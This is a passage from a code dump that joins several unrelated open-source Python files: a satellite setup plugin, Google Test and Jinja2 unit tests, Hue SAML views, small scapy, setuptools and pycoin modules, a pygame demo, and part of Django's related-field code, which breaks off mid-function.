config.sec.delay_after_continuous_tone_disable_before_diseqc.save()
config.sec.delay_after_final_continuous_tone_change.save()
config.sec.delay_after_final_voltage_change.save()
config.sec.delay_between_diseqc_repeats.save()
config.sec.delay_after_last_diseqc_command.save()
config.sec.delay_after_toneburst.save()
config.sec.delay_after_change_voltage_before_switch_command.save()
config.sec.delay_after_enable_voltage_before_switch_command.save()
config.sec.delay_between_switch_and_motor_command.save()
config.sec.delay_after_voltage_change_before_measure_idle_inputpower.save()
config.sec.delay_after_enable_voltage_before_motor_command.save()
config.sec.delay_after_motor_stop_command.save()
config.sec.delay_after_voltage_change_before_motor_command.save()
config.sec.delay_before_sequence_repeat.save()
config.sec.motor_running_timeout.save()
config.sec.motor_command_retries.save()
self.close(True)
session = None
def confirmed(answer):
global session
if answer:
session.open(SecParameterSetup)
def SecSetupMain(Session, **kwargs):
global session
session = Session
session.openWithCallback(confirmed, MessageBox, _("Please do not change any values unless you know what you are doing!"), MessageBox.TYPE_INFO)
def SecSetupStart(menuid):
show = False
# other menu than "scan"?
if menuid != "scan":
return [ ]
# only show if DVB-S frontends are available
for slot in nimmgr.nim_slots:
if slot.isCompatible("DVB-S"):
return [(_("Satellite equipment setup"), SecSetupMain, "satellite_equipment_setup", None)]
return [ ]
def Plugins(**kwargs):
if (nimmgr.hasNimType("DVB-S")):
return PluginDescriptor(name=_("Satellite equipment setup"), description=_("Setup your satellite equipment"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc=SecSetupStart)
else:
return []
|
whynoteasy/bosan | refs/heads/master | external/gtest/test/gtest_list_tests_unittest.py | 1898 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) with various command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
jjmleiro/hue | refs/heads/master | desktop/libs/libsaml/src/libsaml/views.py | 36 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from djangosaml2.views import login, echo_attributes, metadata,\
assertion_consumer_service, logout_service
try:
from djangosaml2.views import logout_service_post
except ImportError:
# We are on an older version of djangosaml2
logout_service_post = None
import libsaml.conf
__all__ = ['login', 'echo_attributes', 'assertion_consumer_service', 'metadata']
if logout_service_post is None:
_assertion_consumer_service = assertion_consumer_service
@require_POST
@csrf_exempt
def assertion_consumer_service(request, config_loader_path=None, attribute_mapping=None, create_unknown_user=None):
username_source = libsaml.conf.USERNAME_SOURCE.get().lower()
return _assertion_consumer_service(request, config_loader_path, attribute_mapping, create_unknown_user, username_source)
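# Mark the SAML views as exempt from the login requirement; Hue's auth
# middleware is assumed to check this login_notrequired attribute.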
setattr(logout_service, 'login_notrequired', True)
setattr(login, 'login_notrequired', True)
setattr(echo_attributes, 'login_notrequired', True)
setattr(assertion_consumer_service, 'login_notrequired', True)
setattr(metadata, 'login_notrequired', True)
if logout_service_post is not None:
setattr(logout_service_post, 'login_notrequired', True)
|
6WIND/scapy | refs/heads/master | scapy/contrib/automotive/obd/mid/__init__.py | 25 | # This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Andreas Korb <andreas.d.korb@gmail.com>
# Copyright (C) Nils Weiss <nils@we155.de>
# This program is published under a GPLv2 license
# scapy.contrib.status = skip
"""
Package of contrib automotive obd specific modules
that have to be loaded explicitly.
"""
|
amisrs/angular-flask | refs/heads/master | angular_flask/lib/python2.7/site-packages/setuptools/py26compat.py | 320 | """
Compatibility Support for Python 2.6 and earlier
"""
import sys
try:
from urllib.parse import splittag
except ImportError:
from urllib import splittag
def strip_fragment(url):
"""
In `Python issue 8280 <http://bugs.python.org/issue8280>`_, Python 2.7 and
later was patched to disregard the fragment when making URL requests.
Do the same for Python 2.6 and earlier.
"""
url, fragment = splittag(url)
return url
if sys.version_info >= (2, 7):
strip_fragment = lambda x: x
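# Behavior sketch: on Python 2.6, strip_fragment('http://host/path#frag')
# returns 'http://host/path'; on 2.7+ the identity function above is used,
# since the stdlib already disregards the fragment.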
try:
from importlib import import_module
except ImportError:
def import_module(module_name):
return __import__(module_name, fromlist=['__name__'])
|
shayanb/pycoin | refs/heads/master | tests/__init__.py | 23 |
import unittest
import doctest
import pycoin.tx.script.microcode
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(pycoin.tx.script.microcode))
return tests
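# This follows the standard unittest load_tests protocol: test discovery
# calls the hook and runs the doctests collected from the microcode module.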
|
thefinn93/CouchPotatoServer | refs/heads/master | libs/jinja2/testsuite/core_tags.py | 90 | # -*- coding: utf-8 -*-
"""
jinja2.testsuite.core_tags
~~~~~~~~~~~~~~~~~~~~~~~~~~
Test the core tags like for and if.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import unittest
from jinja2.testsuite import JinjaTestCase
from jinja2 import Environment, TemplateSyntaxError, UndefinedError, \
DictLoader
env = Environment()
class ForLoopTestCase(JinjaTestCase):
def test_simple(self):
tmpl = env.from_string('{% for item in seq %}{{ item }}{% endfor %}')
assert tmpl.render(seq=range(10)) == '0123456789'
def test_else(self):
tmpl = env.from_string('{% for item in seq %}XXX{% else %}...{% endfor %}')
assert tmpl.render() == '...'
def test_empty_blocks(self):
tmpl = env.from_string('<{% for item in seq %}{% else %}{% endfor %}>')
assert tmpl.render() == '<>'
def test_context_vars(self):
tmpl = env.from_string('''{% for item in seq -%}
{{ loop.index }}|{{ loop.index0 }}|{{ loop.revindex }}|{{
loop.revindex0 }}|{{ loop.first }}|{{ loop.last }}|{{
loop.length }}###{% endfor %}''')
one, two, _ = tmpl.render(seq=[0, 1]).split('###')
(one_index, one_index0, one_revindex, one_revindex0, one_first,
one_last, one_length) = one.split('|')
(two_index, two_index0, two_revindex, two_revindex0, two_first,
two_last, two_length) = two.split('|')
assert int(one_index) == 1 and int(two_index) == 2
assert int(one_index0) == 0 and int(two_index0) == 1
assert int(one_revindex) == 2 and int(two_revindex) == 1
assert int(one_revindex0) == 1 and int(two_revindex0) == 0
assert one_first == 'True' and two_first == 'False'
assert one_last == 'False' and two_last == 'True'
assert one_length == two_length == '2'
def test_cycling(self):
tmpl = env.from_string('''{% for item in seq %}{{
loop.cycle('<1>', '<2>') }}{% endfor %}{%
for item in seq %}{{ loop.cycle(*through) }}{% endfor %}''')
output = tmpl.render(seq=range(4), through=('<1>', '<2>'))
assert output == '<1><2>' * 4
def test_scope(self):
tmpl = env.from_string('{% for item in seq %}{% endfor %}{{ item }}')
output = tmpl.render(seq=range(10))
assert not output
def test_varlen(self):
def inner():
for item in range(5):
yield item
tmpl = env.from_string('{% for item in iter %}{{ item }}{% endfor %}')
output = tmpl.render(iter=inner())
assert output == '01234'
def test_noniter(self):
tmpl = env.from_string('{% for item in none %}...{% endfor %}')
self.assert_raises(TypeError, tmpl.render)
def test_recursive(self):
tmpl = env.from_string('''{% for item in seq recursive -%}
[{{ item.a }}{% if item.b %}<{{ loop(item.b) }}>{% endif %}]
{%- endfor %}''')
assert tmpl.render(seq=[
dict(a=1, b=[dict(a=1), dict(a=2)]),
dict(a=2, b=[dict(a=1), dict(a=2)]),
dict(a=3, b=[dict(a='a')])
]) == '[1<[1][2]>][2<[1][2]>][3<[a]>]'
def test_looploop(self):
tmpl = env.from_string('''{% for row in table %}
{%- set rowloop = loop -%}
{% for cell in row -%}
[{{ rowloop.index }}|{{ loop.index }}]
{%- endfor %}
{%- endfor %}''')
assert tmpl.render(table=['ab', 'cd']) == '[1|1][1|2][2|1][2|2]'
def test_reversed_bug(self):
tmpl = env.from_string('{% for i in items %}{{ i }}'
'{% if not loop.last %}'
',{% endif %}{% endfor %}')
assert tmpl.render(items=reversed([3, 2, 1])) == '1,2,3'
def test_loop_errors(self):
tmpl = env.from_string('''{% for item in [1] if loop.index
== 0 %}...{% endfor %}''')
self.assert_raises(UndefinedError, tmpl.render)
tmpl = env.from_string('''{% for item in [] %}...{% else
%}{{ loop }}{% endfor %}''')
assert tmpl.render() == ''
def test_loop_filter(self):
tmpl = env.from_string('{% for item in range(10) if item '
'is even %}[{{ item }}]{% endfor %}')
assert tmpl.render() == '[0][2][4][6][8]'
tmpl = env.from_string('''
{%- for item in range(10) if item is even %}[{{
loop.index }}:{{ item }}]{% endfor %}''')
assert tmpl.render() == '[1:0][2:2][3:4][4:6][5:8]'
def test_loop_unassignable(self):
self.assert_raises(TemplateSyntaxError, env.from_string,
'{% for loop in seq %}...{% endfor %}')
def test_scoped_special_var(self):
t = env.from_string('{% for s in seq %}[{{ loop.first }}{% for c in s %}'
'|{{ loop.first }}{% endfor %}]{% endfor %}')
assert t.render(seq=('ab', 'cd')) == '[True|True|False][False|True|False]'
def test_scoped_loop_var(self):
t = env.from_string('{% for x in seq %}{{ loop.first }}'
'{% for y in seq %}{% endfor %}{% endfor %}')
assert t.render(seq='ab') == 'TrueFalse'
t = env.from_string('{% for x in seq %}{% for y in seq %}'
'{{ loop.first }}{% endfor %}{% endfor %}')
assert t.render(seq='ab') == 'TrueFalseTrueFalse'
def test_recursive_empty_loop_iter(self):
t = env.from_string('''
{%- for item in foo recursive -%}{%- endfor -%}
''')
assert t.render(dict(foo=[])) == ''
def test_call_in_loop(self):
t = env.from_string('''
{%- macro do_something() -%}
[{{ caller() }}]
{%- endmacro %}
{%- for i in [1, 2, 3] %}
{%- call do_something() -%}
{{ i }}
{%- endcall %}
{%- endfor -%}
''')
assert t.render() == '[1][2][3]'
def test_scoping_bug(self):
t = env.from_string('''
{%- for item in foo %}...{{ item }}...{% endfor %}
{%- macro item(a) %}...{{ a }}...{% endmacro %}
{{- item(2) -}}
''')
assert t.render(foo=(1,)) == '...1......2...'
def test_unpacking(self):
tmpl = env.from_string('{% for a, b, c in [[1, 2, 3]] %}'
'{{ a }}|{{ b }}|{{ c }}{% endfor %}')
assert tmpl.render() == '1|2|3'
class IfConditionTestCase(JinjaTestCase):
def test_simple(self):
tmpl = env.from_string('''{% if true %}...{% endif %}''')
assert tmpl.render() == '...'
def test_elif(self):
tmpl = env.from_string('''{% if false %}XXX{% elif true
%}...{% else %}XXX{% endif %}''')
assert tmpl.render() == '...'
def test_else(self):
tmpl = env.from_string('{% if false %}XXX{% else %}...{% endif %}')
assert tmpl.render() == '...'
def test_empty(self):
tmpl = env.from_string('[{% if true %}{% else %}{% endif %}]')
assert tmpl.render() == '[]'
def test_complete(self):
tmpl = env.from_string('{% if a %}A{% elif b %}B{% elif c == d %}'
'C{% else %}D{% endif %}')
assert tmpl.render(a=0, b=False, c=42, d=42.0) == 'C'
def test_no_scope(self):
tmpl = env.from_string('{% if a %}{% set foo = 1 %}{% endif %}{{ foo }}')
assert tmpl.render(a=True) == '1'
tmpl = env.from_string('{% if true %}{% set foo = 1 %}{% endif %}{{ foo }}')
assert tmpl.render() == '1'
class MacrosTestCase(JinjaTestCase):
env = Environment(trim_blocks=True)
def test_simple(self):
tmpl = self.env.from_string('''\
{% macro say_hello(name) %}Hello {{ name }}!{% endmacro %}
{{ say_hello('Peter') }}''')
assert tmpl.render() == 'Hello Peter!'
def test_scoping(self):
tmpl = self.env.from_string('''\
{% macro level1(data1) %}
{% macro level2(data2) %}{{ data1 }}|{{ data2 }}{% endmacro %}
{{ level2('bar') }}{% endmacro %}
{{ level1('foo') }}''')
assert tmpl.render() == 'foo|bar'
def test_arguments(self):
tmpl = self.env.from_string('''\
{% macro m(a, b, c='c', d='d') %}{{ a }}|{{ b }}|{{ c }}|{{ d }}{% endmacro %}
{{ m() }}|{{ m('a') }}|{{ m('a', 'b') }}|{{ m(1, 2, 3) }}''')
assert tmpl.render() == '||c|d|a||c|d|a|b|c|d|1|2|3|d'
def test_varargs(self):
tmpl = self.env.from_string('''\
{% macro test() %}{{ varargs|join('|') }}{% endmacro %}\
{{ test(1, 2, 3) }}''')
assert tmpl.render() == '1|2|3'
def test_simple_call(self):
tmpl = self.env.from_string('''\
{% macro test() %}[[{{ caller() }}]]{% endmacro %}\
{% call test() %}data{% endcall %}''')
assert tmpl.render() == '[[data]]'
def test_complex_call(self):
tmpl = self.env.from_string('''\
{% macro test() %}[[{{ caller('data') }}]]{% endmacro %}\
{% call(data) test() %}{{ data }}{% endcall %}''')
assert tmpl.render() == '[[data]]'
def test_caller_undefined(self):
tmpl = self.env.from_string('''\
{% set caller = 42 %}\
{% macro test() %}{{ caller is not defined }}{% endmacro %}\
{{ test() }}''')
assert tmpl.render() == 'True'
def test_include(self):
self.env = Environment(loader=DictLoader({'include':
'{% macro test(foo) %}[{{ foo }}]{% endmacro %}'}))
tmpl = self.env.from_string('{% from "include" import test %}{{ test("foo") }}')
assert tmpl.render() == '[foo]'
def test_macro_api(self):
tmpl = self.env.from_string('{% macro foo(a, b) %}{% endmacro %}'
'{% macro bar() %}{{ varargs }}{{ kwargs }}{% endmacro %}'
'{% macro baz() %}{{ caller() }}{% endmacro %}')
assert tmpl.module.foo.arguments == ('a', 'b')
assert tmpl.module.foo.defaults == ()
assert tmpl.module.foo.name == 'foo'
assert not tmpl.module.foo.caller
assert not tmpl.module.foo.catch_kwargs
assert not tmpl.module.foo.catch_varargs
assert tmpl.module.bar.arguments == ()
assert tmpl.module.bar.defaults == ()
assert not tmpl.module.bar.caller
assert tmpl.module.bar.catch_kwargs
assert tmpl.module.bar.catch_varargs
assert tmpl.module.baz.caller
def test_callself(self):
tmpl = self.env.from_string('{% macro foo(x) %}{{ x }}{% if x > 1 %}|'
'{{ foo(x - 1) }}{% endif %}{% endmacro %}'
'{{ foo(5) }}')
assert tmpl.render() == '5|4|3|2|1'
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ForLoopTestCase))
suite.addTest(unittest.makeSuite(IfConditionTestCase))
suite.addTest(unittest.makeSuite(MacrosTestCase))
return suite
|
abhianand7/python_programs | refs/heads/master | pygame_assignment/pygame_02.py | 1 |
import pygame
import sys
from pygame.locals import *
pygame.init()
white = (255,255,255) #defining colour in RGB
black = (0,0,0)
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
yellow = (255,255,0)
cyan = (0,255,255)
purple = (255,0,255)
setDisplay = pygame.display.set_mode((400,300))
singlePixel = pygame.PixelArray(setDisplay) # you can draw each pixel separately
singlePixel[5][5] = yellow
pygame.display.set_caption('PyGame Tutorial')
while True:
for event in pygame.event.get():
print event
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
|
spawnedc/MeCanBlog | refs/heads/master | django/db/models/fields/related.py | 82 | from django.conf import settings
from django.db import connection, router, transaction, connections
from django.db.backends import util
from django.db.models import signals, get_model
from django.db.models.fields import (AutoField, Field, IntegerField,
PositiveIntegerField, PositiveSmallIntegerField, FieldDoesNotExist)
from django.db.models.related import RelatedObject
from django.db.models.query import QuerySet
from django.db.models.query_utils import QueryWrapper
from django.db.models.deletion import CASCADE
from django.utils.encoding import smart_unicode
from django.utils.translation import (ugettext_lazy as _, string_concat,
ungettext, ugettext)
from django.utils.functional import curry
from django.core import exceptions
from django import forms
RECURSIVE_RELATIONSHIP_CONSTANT = 'self'
pending_lookups = {}
def add_lazy_relation(cls, field, relation, operation):
"""
Adds a lookup on ``cls`` when a related field is defined using a string,
i.e.::
class MyModel(Model):
fk = ForeignKey("AnotherModel")
This string can be:
* RECURSIVE_RELATIONSHIP_CONSTANT (i.e. "self") to indicate a recursive
relation.
* The name of a model (i.e "AnotherModel") to indicate another model in
the same app.
* An app-label and model name (i.e. "someapp.AnotherModel") to indicate
another model in a different app.
If the other model hasn't yet been loaded -- almost a given if you're using
lazy relationships -- then the relation won't be set up until the
class_prepared signal fires at the end of model initialization.
operation is the work that must be performed once the relation can be resolved.
"""
# Check for recursive relations
if relation == RECURSIVE_RELATIONSHIP_CONSTANT:
app_label = cls._meta.app_label
model_name = cls.__name__
else:
# Look for an "app.Model" relation
try:
app_label, model_name = relation.split(".")
except ValueError:
# If we can't split, assume a model in current app
app_label = cls._meta.app_label
model_name = relation
except AttributeError:
# If it doesn't have a split it's actually a model class
app_label = relation._meta.app_label
model_name = relation._meta.object_name
# Try to look up the related model, and if it's already loaded resolve the
# string right away. If get_model returns None, it means that the related
# model isn't loaded yet, so we need to pend the relation until the class
# is prepared.
model = get_model(app_label, model_name, False)
if model:
operation(field, model, cls)
else:
key = (app_label, model_name)
value = (cls, field, operation)
pending_lookups.setdefault(key, []).append(value)
def do_pending_lookups(sender, **kwargs):
"""
Handle any pending relations to the sending model. Sent from class_prepared.
"""
key = (sender._meta.app_label, sender.__name__)
for cls, field, operation in pending_lookups.pop(key, []):
operation(field, sender, cls)
signals.class_prepared.connect(do_pending_lookups)
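# Every newly prepared model class flushes any string-based relations that
# were registered while waiting for it.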
#HACK
class RelatedField(object):
def contribute_to_class(self, cls, name):
sup = super(RelatedField, self)
# Store the opts for related_query_name()
self.opts = cls._meta
if hasattr(sup, 'contribute_to_class'):
sup.contribute_to_class(cls, name)
if not cls._meta.abstract and self.rel.related_name:
self.rel.related_name = self.rel.related_name % {
'class': cls.__name__.lower(),
'app_label': cls._meta.app_label.lower(),
}
other = self.rel.to
if isinstance(other, basestring) or other._meta.pk is None:
def resolve_related_class(field, model, cls):
field.rel.to = model
field.do_related_class(model, cls)
add_lazy_relation(cls, self, other, resolve_related_class)
else:
self.do_related_class(other, cls)
def set_attributes_from_rel(self):
self.name = self.name or (self.rel.to._meta.object_name.lower() + '_' + self.rel.to._meta.pk.name)
if self.verbose_name is None:
self.verbose_name = self.rel.to._meta.verbose_name
self.rel.field_name = self.rel.field_name or self.rel.to._meta.pk.name
def do_related_class(self, other, cls):
self.set_attributes_from_rel()
self.related = RelatedObject(other, cls, self)
if not cls._meta.abstract:
self.contribute_to_related_class(other, self.related)
def get_prep_lookup(self, lookup_type, value):
if hasattr(value, 'prepare'):
return value.prepare()
if hasattr(value, '_prepare'):
return value._prepare()
# FIXME: lt and gt are explicitly allowed to make
# get_(next/prev)_by_date work; other lookups are not allowed since that
# gets messy pretty quick. This is a good candidate for some refactoring
# in the future.
if lookup_type in ['exact', 'gt', 'lt', 'gte', 'lte']:
return self._pk_trace(value, 'get_prep_lookup', lookup_type)
if lookup_type in ('range', 'in'):
return [self._pk_trace(v, 'get_prep_lookup', lookup_type) for v in value]
elif lookup_type == 'isnull':
return []
raise TypeError("Related Field has invalid lookup: %s" % lookup_type)
def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
if not prepared:
value = self.get_prep_lookup(lookup_type, value)
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql') or hasattr(value, '_as_sql'):
# If the value has a relabel_aliases method, it will need to
# be invoked before the final SQL is evaluated
if hasattr(value, 'relabel_aliases'):
return value
if hasattr(value, 'as_sql'):
sql, params = value.as_sql()
else:
sql, params = value._as_sql(connection=connection)
return QueryWrapper(('(%s)' % sql), params)
# FIXME: lt and gt are explicitly allowed to make
# get_(next/prev)_by_date work; other lookups are not allowed since that
# gets messy pretty quick. This is a good candidate for some refactoring
# in the future.
if lookup_type in ['exact', 'gt', 'lt', 'gte', 'lte']:
return [self._pk_trace(value, 'get_db_prep_lookup', lookup_type,
connection=connection, prepared=prepared)]
if lookup_type in ('range', 'in'):
return [self._pk_trace(v, 'get_db_prep_lookup', lookup_type,
connection=connection, prepared=prepared)
for v in value]
elif lookup_type == 'isnull':
return []
raise TypeError("Related Field has invalid lookup: %s" % lookup_type)
def _pk_trace(self, value, prep_func, lookup_type, **kwargs):
# Value may be a primary key, or an object held in a relation.
# If it is an object, then we need to get the primary key value for
# that object. In certain conditions (especially one-to-one relations),
# the primary key may itself be an object - so we need to keep drilling
# down until we hit a value that can be used for a comparison.
v = value
# In the case of an FK to 'self', this check allows to_field to be used
# for both forwards and reverse lookups across the FK. (For normal FKs,
# it's only relevant for forward lookups).
if isinstance(v, self.rel.to):
field_name = getattr(self.rel, "field_name", None)
else:
field_name = None
try:
while True:
if field_name is None:
field_name = v._meta.pk.name
v = getattr(v, field_name)
field_name = None
except AttributeError:
pass
except exceptions.ObjectDoesNotExist:
v = None
field = self
while field.rel:
if hasattr(field.rel, 'field_name'):
field = field.rel.to._meta.get_field(field.rel.field_name)
else:
field = field.rel.to._meta.pk
if lookup_type in ('range', 'in'):
v = [v]
v = getattr(field, prep_func)(lookup_type, v, **kwargs)
if isinstance(v, list):
v = v[0]
return v
def related_query_name(self):
# This method defines the name that can be used to identify this
# related object in a table-spanning query. It uses the lower-cased
# object_name by default, but this can be overridden with the
# "related_name" option.
return self.rel.related_name or self.opts.object_name.lower()
class SingleRelatedObjectDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# a single "remote" value, on the class pointed to by a related field.
# In the example "place.restaurant", the restaurant attribute is a
# SingleRelatedObjectDescriptor instance.
def __init__(self, related):
self.related = related
self.cache_name = related.get_cache_name()
def __get__(self, instance, instance_type=None):
if instance is None:
return self
try:
return getattr(instance, self.cache_name)
except AttributeError:
params = {'%s__pk' % self.related.field.name: instance._get_pk_val()}
db = router.db_for_read(self.related.model, instance=instance)
rel_obj = self.related.model._base_manager.using(db).get(**params)
setattr(instance, self.cache_name, rel_obj)
return rel_obj
def __set__(self, instance, value):
if instance is None:
raise AttributeError("%s must be accessed via instance" % self.related.opts.object_name)
# The similarity of the code below to the code in
# ReverseSingleRelatedObjectDescriptor is annoying, but there's a bunch
# of small differences that would make a common base class convoluted.
# If null=True, we can assign null here, but otherwise the value needs
# to be an instance of the related class.
if value is None and self.related.field.null == False:
raise ValueError('Cannot assign None: "%s.%s" does not allow null values.' %
(instance._meta.object_name, self.related.get_accessor_name()))
elif value is not None and not isinstance(value, self.related.model):
raise ValueError('Cannot assign "%r": "%s.%s" must be a "%s" instance.' %
(value, instance._meta.object_name,
self.related.get_accessor_name(), self.related.opts.object_name))
elif value is not None:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": instance is on database "%s", value is on database "%s"' %
(value, instance._state.db, value._state.db))
# Set the value of the related field to the value of the related object's related field
setattr(value, self.related.field.attname, getattr(instance, self.related.field.rel.get_related_field().attname))
# Since we already know what the related object is, seed the related
# object caches now, too. This avoids another db hit if you get the
# object you just set.
setattr(instance, self.cache_name, value)
setattr(value, self.related.field.get_cache_name(), instance)
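# A minimal sketch (hypothetical models) of the descriptor above in use;
# the reverse side of a OneToOneField costs one query on first access and
# is then served from the per-instance cache seeded in __get__/__set__:
#
#     class Place(models.Model):
#         name = models.CharField(max_length=50)
#
#     class Restaurant(models.Model):
#         place = models.OneToOneField(Place)
#
#     place.restaurant   # first access: one query via _base_manager
#     place.restaurant   # second access: no query, cached object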
class ReverseSingleRelatedObjectDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# a single "remote" value, on the class that defines the related field.
# In the example "choice.poll", the poll attribute is a
# ReverseSingleRelatedObjectDescriptor instance.
def __init__(self, field_with_rel):
self.field = field_with_rel
def __get__(self, instance, instance_type=None):
if instance is None:
return self
cache_name = self.field.get_cache_name()
try:
return getattr(instance, cache_name)
except AttributeError:
val = getattr(instance, self.field.attname)
if val is None:
# If NULL is an allowed value, return it.
if self.field.null:
return None
raise self.field.rel.to.DoesNotExist
other_field = self.field.rel.get_related_field()
if other_field.rel:
params = {'%s__pk' % self.field.rel.field_name: val}
else:
params = {'%s__exact' % self.field.rel.field_name: val}
# If the related manager indicates that it should be used for
# related fields, respect that.
rel_mgr = self.field.rel.to._default_manager
